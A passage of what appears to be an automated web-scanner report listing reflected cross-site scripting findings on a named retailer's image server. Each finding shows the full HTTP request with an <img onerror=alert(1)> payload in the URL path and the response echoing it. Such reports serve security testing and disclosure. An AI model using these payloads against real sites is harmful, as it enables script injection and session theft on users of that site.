Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:09:44 GMT
Connection: close

Unable to find /pacsunproducts/8425670_01_0415e727<img src=a onerror=alert(1)>7a30eede312

3.180. http://images3.pacsun.com/is/image/pacsunproducts/8426819_01 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8426819_01

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a9f36<img%20src%3da%20onerror%3dalert(1)>5c1fecab3cd was submitted in the REST URL parameter 4. This input was echoed as a9f36<img src=a onerror=alert(1)>5c1fecab3cd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8426819_01a9f36<img%20src%3da%20onerror%3dalert(1)>5c1fecab3cd?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:14 GMT
Connection: close

Unable to find /pacsunproducts/8426819_01a9f36<img src=a onerror=alert(1)>5c1fecab3cd

3.181. http://images3.pacsun.com/is/image/pacsunproducts/8438806_01_025 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8438806_01_025

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 7247c<img%20src%3da%20onerror%3dalert(1)>ddc992b41ad was submitted in the REST URL parameter 4. This input was echoed as 7247c<img src=a onerror=alert(1)>ddc992b41ad in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8438806_01_0257247c<img%20src%3da%20onerror%3dalert(1)>ddc992b41ad?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:09:41 GMT
Connection: close

Unable to find /pacsunproducts/8438806_01_0257247c<img src=a onerror=alert(1)>ddc992b41ad

3.182. http://images3.pacsun.com/is/image/pacsunproducts/8637464_01_030 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8637464_01_030

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 90a9c<img%20src%3da%20onerror%3dalert(1)>442113cd0c1 was submitted in the REST URL parameter 4. This input was echoed as 90a9c<img src=a onerror=alert(1)>442113cd0c1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8637464_01_03090a9c<img%20src%3da%20onerror%3dalert(1)>442113cd0c1?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:09:45 GMT
Connection: close

Unable to find /pacsunproducts/8637464_01_03090a9c<img src=a onerror=alert(1)>442113cd0c1

3.183. http://images3.pacsun.com/is/image/pacsunproducts/8637464_sw_030 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8637464_sw_030

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload fb28d<img%20src%3da%20onerror%3dalert(1)>55aeca0da2a was submitted in the REST URL parameter 4. This input was echoed as fb28d<img src=a onerror=alert(1)>55aeca0da2a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8637464_sw_030fb28d<img%20src%3da%20onerror%3dalert(1)>55aeca0da2a?$11_product_swatch$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:09:43 GMT
Connection: close

Unable to find /pacsunproducts/8637464_sw_030fb28d<img src=a onerror=alert(1)>55aeca0da2a

3.184. http://images3.pacsun.com/is/image/pacsunproducts/8637464_sw_040 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8637464_sw_040

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload dcebf<img%20src%3da%20onerror%3dalert(1)>21784df730a was submitted in the REST URL parameter 4. This input was echoed as dcebf<img src=a onerror=alert(1)>21784df730a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8637464_sw_040dcebf<img%20src%3da%20onerror%3dalert(1)>21784df730a?$11_product_swatch$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:09:50 GMT
Connection: close

Unable to find /pacsunproducts/8637464_sw_040dcebf<img src=a onerror=alert(1)>21784df730a

3.185. http://images3.pacsun.com/is/image/pacsunproducts/8637613_01_085 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8637613_01_085

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e8804<img%20src%3da%20onerror%3dalert(1)>67595dbea58 was submitted in the REST URL parameter 4. This input was echoed as e8804<img src=a onerror=alert(1)>67595dbea58 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8637613_01_085e8804<img%20src%3da%20onerror%3dalert(1)>67595dbea58?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:09:43 GMT
Connection: close

Unable to find /pacsunproducts/8637613_01_085e8804<img src=a onerror=alert(1)>67595dbea58

3.186. http://images3.pacsun.com/is/image/pacsunproducts/8643207_01 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8643207_01

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 79048<img%20src%3da%20onerror%3dalert(1)>749ccefca97 was submitted in the REST URL parameter 4. This input was echoed as 79048<img src=a onerror=alert(1)>749ccefca97 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8643207_0179048<img%20src%3da%20onerror%3dalert(1)>749ccefca97?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:09:55 GMT
Connection: close

Unable to find /pacsunproducts/8643207_0179048<img src=a onerror=alert(1)>749ccefca97

3.187. http://images3.pacsun.com/is/image/pacsunproducts/8660490_01 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8660490_01

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ecb0e<img%20src%3da%20onerror%3dalert(1)>6e752a7b23e was submitted in the REST URL parameter 4. This input was echoed as ecb0e<img src=a onerror=alert(1)>6e752a7b23e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8660490_01ecb0e<img%20src%3da%20onerror%3dalert(1)>6e752a7b23e?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:13 GMT
Connection: close

Unable to find /pacsunproducts/8660490_01ecb0e<img src=a onerror=alert(1)>6e752a7b23e

3.188. http://images3.pacsun.com/is/image/pacsunproducts/8661019_01 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8661019_01

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f991d<img%20src%3da%20onerror%3dalert(1)>ef4f0d284ae was submitted in the REST URL parameter 4. This input was echoed as f991d<img src=a onerror=alert(1)>ef4f0d284ae in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8661019_01f991d<img%20src%3da%20onerror%3dalert(1)>ef4f0d284ae?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:09:56 GMT
Connection: close

Unable to find /pacsunproducts/8661019_01f991d<img src=a onerror=alert(1)>ef4f0d284ae

3.189. http://images3.pacsun.com/is/image/pacsunproducts/8670820_01 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8670820_01

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload cf79c<img%20src%3da%20onerror%3dalert(1)>98a86016311 was submitted in the REST URL parameter 4. This input was echoed as cf79c<img src=a onerror=alert(1)>98a86016311 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8670820_01cf79c<img%20src%3da%20onerror%3dalert(1)>98a86016311?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:06 GMT
Connection: close

Unable to find /pacsunproducts/8670820_01cf79c<img src=a onerror=alert(1)>98a86016311

3.190. http://images3.pacsun.com/is/image/pacsunproducts/8684037_01_041 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8684037_01_041

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload bb496<img%20src%3da%20onerror%3dalert(1)>b68810f499d was submitted in the REST URL parameter 4. This input was echoed as bb496<img src=a onerror=alert(1)>b68810f499d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8684037_01_041bb496<img%20src%3da%20onerror%3dalert(1)>b68810f499d?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:09 GMT
Connection: close

Unable to find /pacsunproducts/8684037_01_041bb496<img src=a onerror=alert(1)>b68810f499d

3.191. http://images3.pacsun.com/is/image/pacsunproducts/8684037_sw_003 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8684037_sw_003

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ebf0a<img%20src%3da%20onerror%3dalert(1)>215758b8353 was submitted in the REST URL parameter 4. This input was echoed as ebf0a<img src=a onerror=alert(1)>215758b8353 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8684037_sw_003ebf0a<img%20src%3da%20onerror%3dalert(1)>215758b8353?$11_product_swatch$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
